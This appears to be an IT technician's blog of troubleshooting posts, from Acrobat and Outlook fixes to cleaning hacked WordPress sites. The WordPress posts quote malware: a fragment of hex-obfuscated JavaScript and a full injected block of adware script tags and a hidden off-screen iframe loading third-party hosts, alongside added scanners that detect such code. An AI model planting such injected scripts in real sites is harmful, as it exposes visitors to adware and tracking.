Wednesday, November 20, 2019

Acrobat won’t open “Attempt to access invalid address”

We had a user that suddenly couldn’t open any local or networked PDF files. I uninstalled, ran CCleaner, Adobe’s after acrobat cleaner, restarted the machine, and finally re-installed Acrobat. Same error came up.

This issue was solved by uninstalling EMET 5.1. Not really what I wanted to do but the user had to get work done.

Going to follow up with Adobe for a better solution.

The following link pointed me in the EMET direction.

https://forums.adobe.com/message/6830531

Hope this helps someone else out there….

iPhone not syncing with Exchange

We have had several calls about someone getting a new iPhone 6 and now they are no longer receiving the company emails, which are handled with an Exchange server. We set up the connection and get all check marks, but it still won’t sync. Here is what we have found to solve it.

  1. In Active Directory click on “View” and check “Users, Contacts, Groups, and Computers as containers.”
  2. The user with the issue now shows a plus sign next to it.
  3. Expand the plus sign and select “ExchangeActiveSyncDevices”.
  4. Remove any entries and the person should now be able to connect.

Outlook “Sorry we are having trouble opening this item. This could be temporary..”

Had a couple of users that were getting this error:

“Sorry, we’re having trouble opening this item. This could be temporary, but if you see it again you might want to restart Outlook”

They use an Exchange server. This was solved by rebuilding the Outlook profile. Here were the steps.

  1. Go into the control panel >> mail >> show profiles.
  2. Add a new profile, and click next. It should find the user’s credentials from the Exchange server.
  3. Check “Prompt for a profile to be used.”
  4. Restart Outlook and select the new profile.
  5. Then go back to the control panel >> Mail >> Show Profiles and select “Always use this profile.” Use the dropdown and select the new profile. Hit apply.
  6. You may need to restart Outlook a few times for everything to work properly. At the bottom of Outlook you will see Outlook adding the emails back into this new profile.
  7. When everything is working you can delete the old profile.

What is SEO poisoning?

I found the following article that introduced me to the term “SEO poisoning.”

http://www.scmagazine.com/attackers-use-seo-spam-to-improve-the-rankings-of-their-websites-on-google-and-other-search-engines/article/375339/

I was considering this Cross-Site Scripting, but the code wasn’t malicious; it was just leading back to another site selling their services. The term SEO poisoning makes more sense. The goal of this poisoning is to increase the rankings of the company performing the action by embedding links into a legitimate site and linking back to their site. Link backs are part of the matrix Google uses to rank your site.

The links are often displayed off screen, so webmasters are usually unaware of the poisoning even happening. Fortunately some of the writers of the plugins are aware of this technique and are incorporating tools into their plugins.

WordPress site blocked by SonicWall – JS.Agent.NKW_2 (Trojan)

Had a customer’s website blocked by our internal firewall.


They were running WP Antivirus Site Protection plug-in. It listed the following files.

  • /wp-content/plugins/nextgen-gallery/nggallery.php
  • /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ngglegacy/lib/imagemagick.inc.php
  • /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/router/class.router.php
  • /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/router/class.routing_app.php
  • /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/router/interface.routing_app.php
  • /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/wordpress_routing/adapter.wordpress_routing_app.php
  • /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ngglegacy/admin/functions.php
  • /wp-content/plugins/si-contact-form/includes/class-fscf-process.php

 

This link provided me with some detail. There was code that looked like "\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72",

Deleting this out is supposed to help.

https://wordpress.org/support/topic/jsagent-warnings-in-avg-nightmare-hack-in-multiple-wordpress-sites

Here is a good article on this issue.

http://blog.sucuri.net/2012/12/website-malware-sharp-increase-in-spam-attacks-wordpress-joomla.html
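The escaped strings quoted above are ordinary ASCII written as `\xNN` bytes, so a file scan can flag them and show what they say before anything is deleted. The following is an added example, not code from the original post or from any plugin; the variable name `_0xa` and the file name `sample.php` are constructed, and the sample reuses three of the strings quoted above.

```python
import re

# A quoted string made up entirely of at least MIN_RUN consecutive \xNN escapes.
MIN_RUN = 4
HEX_RUN = re.compile(r'(["\'])((?:\\x[0-9A-Fa-f]{2}){%d,})\1' % MIN_RUN)


def decode_hex_strings(text):
    """Return the decoded value of every fully hex-escaped string literal."""
    decoded = []
    for match in HEX_RUN.finditer(text):
        raw = match.group(2)
        # Each escape is four characters: backslash, 'x', two hex digits.
        data = bytes(int(raw[i + 2:i + 4], 16) for i in range(0, len(raw), 4))
        decoded.append(data.decode("latin-1"))
    return decoded


def scan_file_text(name, text):
    """Return (name, line number, decoded strings) for each suspicious line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        strings = decode_hex_strings(line)
        if strings:
            findings.append((name, lineno, strings))
    return findings


# Constructed sample: a clean PHP line followed by a line carrying escaped
# strings like the ones in the post (the variable name _0xa is made up).
SAMPLE = (
    '<?php echo get_option("blogname"); ?>\n'
    '<script>var _0xa=["\\x73\\x63\\x5F\\x63\\x6F",'
    '"\\x67\\x65\\x74\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74\\x42\\x79\\x49\\x64",'
    '"\\x72\\x65\\x66\\x65\\x72\\x72\\x65\\x72"];</script>\n'
)

if __name__ == "__main__":
    for name, lineno, strings in scan_file_text("sample.php", SAMPLE):
        print(f"{name}:{lineno}: {strings}")
```

Running `scan_file_text` over the text of each file the plug-in listed gives the line numbers to inspect and compare against a clean copy of the plugin.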

 

 

WordPress site infected with CouponDropDown Adware

A customer’s WordPress site got hacked. They use Network Solutions as their host. Network Solutions took their site offline. We had to delete all the WordPress files, upload a clean version, and put their content and theme back. After that the site was back up and running.

I reviewed the site to make sure the permalinks didn’t cause a problem. On one page there were banner ads showing up.


The issue turned out to be a form of Cross Site Scripting or SEO poisoning. There was a database entry that had the extra text in it. Here is the text below.

————————————————————————————————–

<div id=”__tbSetup”></div>

<script type=”text/javascript” src=”http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862″></script><script type=”text/javascript” src=”https://loading-resource.com/data.js.php?i={6C425871-ABD5-4124-A2B2-C02CE1D37F67}&amp;d=2013-1-17&amp;s=http://mcmanus-darden.com/home/wp-admin/post.php?post=361&amp;action=edit”></script><script id=”__changoScript” type=”text/javascript”>// <![CDATA[

var __chd__ = {‘aid’:11079,’chaid’:’www_objectify_ca’};(function() { var c = document.createElement(‘script’); c.type = ‘text/javascript’; c.async = true;c.src = ( ‘https:’ == document.location.protocol ? ‘https://z’: ‘http://p’) + ‘.chango.com/static/c.js’; var s = document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(c, s);})();

// ]]></script><script id=”__simpliScript” type=”text/javascript” src=”http://i.simpli.fi/dpx.js?cid=3065&amp;m=1″ data-sifi-parsed=”true”></script><script type=”text/javascript” src=”http://www.superfish.com/ws/sf_main.jsp?dlsource=wjfudcm&amp;userId=ezZDNDI1ODcxLUFCRDUtND&amp;CTID=default-US”></script><script type=”text/javascript” src=”http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js”></script><script type=”text/javascript” src=”http://i.simpli.fi/p?cid=3065&amp;cb=dpx_48652254532._hp”></script><iframe id=”l3adg3n-xdm” style=”position: absolute; top: -1000px; left: -1000px; width: 1px; height: 1px;” src=”http://www.vitruvianleads.com/build/xdm.html” width=”320″ height=”240″></iframe>

————————————————————————————————–

There were multiple entries under this title. I used the source to figure out the actual page it was affecting. It was entry 361. There were approximately 20 revisions, but it was the original 361 that took the script off the site. It was in some revisions but not all.

I hope this helps someone else….
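Both the off-screen links described in the SEO poisoning post and the script and iframe tags found in this database entry can be picked out of stored post content mechanically. The following is an added example, not code from the original posts; the host names are placeholders in the reserved example domains, the sample content is constructed, and `scan_post` is a hypothetical helper name.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

# Inline styles that push an element far outside the visible page.
OFFSCREEN = re.compile(r'(?:top|left|text-indent)\s*:\s*-\d{3,}px', re.I)


class InjectionFinder(HTMLParser):
    """Collect third-party script/iframe sources and off-screen elements."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        src = attrs.get("src") or attrs.get("href") or ""
        host = (urlparse(src).hostname or "").lower()
        external = bool(host) and host != self.site_host
        if tag in ("script", "iframe") and external:
            self.findings.append(("external-" + tag, host))
        if OFFSCREEN.search(attrs.get("style") or ""):
            self.findings.append(("offscreen-" + tag, host or "inline"))


def scan_post(content, site_host):
    """Return (finding type, host) tuples for one post's stored HTML."""
    finder = InjectionFinder(site_host)
    finder.feed(content)
    finder.close()
    return finder.findings


# Constructed post content: hosts are placeholders, not the ones in the post.
SAMPLE_POST = (
    '<p>Our office hours are 9 to 5.</p>'
    '<script src="/wp-includes/js/jquery.js"></script>'
    '<script type="text/javascript" src="http://ads.example.net/l.js"></script>'
    '<iframe style="position: absolute; top: -1000px; left: -1000px;" '
    'src="http://leads.example.org/xdm.html"></iframe>'
    '<a style="position:absolute;left:-9999px" '
    'href="http://seo.example.net/">cheap services</a>'
)

if __name__ == "__main__":
    for kind, host in scan_post(SAMPLE_POST, "www.example.com"):
        print(kind, host)
```

Since the injected text was in some revisions but not all, the same check is worth running over every stored revision of an entry, not only the published one.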